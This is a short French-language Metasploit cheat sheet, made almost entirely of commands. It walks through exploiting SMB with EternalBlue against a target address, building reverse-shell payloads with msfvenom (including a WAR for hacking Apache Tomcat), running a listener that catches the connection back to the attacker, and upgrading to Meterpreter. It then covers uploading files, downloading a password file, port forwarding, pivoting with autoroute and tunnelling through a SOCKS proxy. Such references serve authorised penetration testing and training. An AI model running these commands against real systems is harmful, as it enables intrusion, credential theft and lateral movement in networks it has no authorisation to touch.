Démarrer Metasploit
# msfconsole
Chercher un exploit:
# search eternalblue
Utiliser un exploit
# use exploit/windows/smb/ms17_010_eternalblue
Configurer les paramètres de l’exploit
# show options
# set TARGET 192.168.2.55
Exécuter l’exploit
# exploit
Générer le code pour un reverse SHELL (WAR). Pour hacker un serveur Apache Tomcat
# msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.2.33 LPORT=443 -f war > sh.war
Reverse shell payload
msfvenom -p linux/x64/shell/meterpreter_reverse_tcp -f elf -o shell LHOST=10.10.10.5 LPORT=443
Reverse shell listener avec msfconsole
# use exploit/multi/handler
# set payload linux/x64/shell_reverse_tcp
# set LHOST 192.168.2.33
# set LPORT 443
# exploit
Upgrade vers Meterpreter
# sessions -j
# background
# list sessions
# sessions -u 1
# sessions 2
# sysinfo # commande meterpreter
Téléverser / Télécharger un fichier (meterpreter)
# upload pwn.exe
# download c:\password.txt
Créer un port sur la machine de l’attaqueur pour accéder à un service qui n’est pas directement accessible (meterpreter)
# portfwd add -l 3306 -p 3306 -r 10.5.24.24
# mysql -u root localhost
Pivoter en utilisante une session Meterpreter existante
# use post/multi/manager/autoroute
# set session 2 #meterpreter session
# run
# route
Socks via Meterpreter (requiert autoroute)
# use auxiliary/server/socks4a
# set SRVPORT 8080
# run
Configurer ProxyChains
# vi /etc/proxychains.conf
[…]
socks4 127.0.0.1 8080
se connecter en utilisant un proxy SOCKS:
#proxychains ncat 172.23.33.33 1337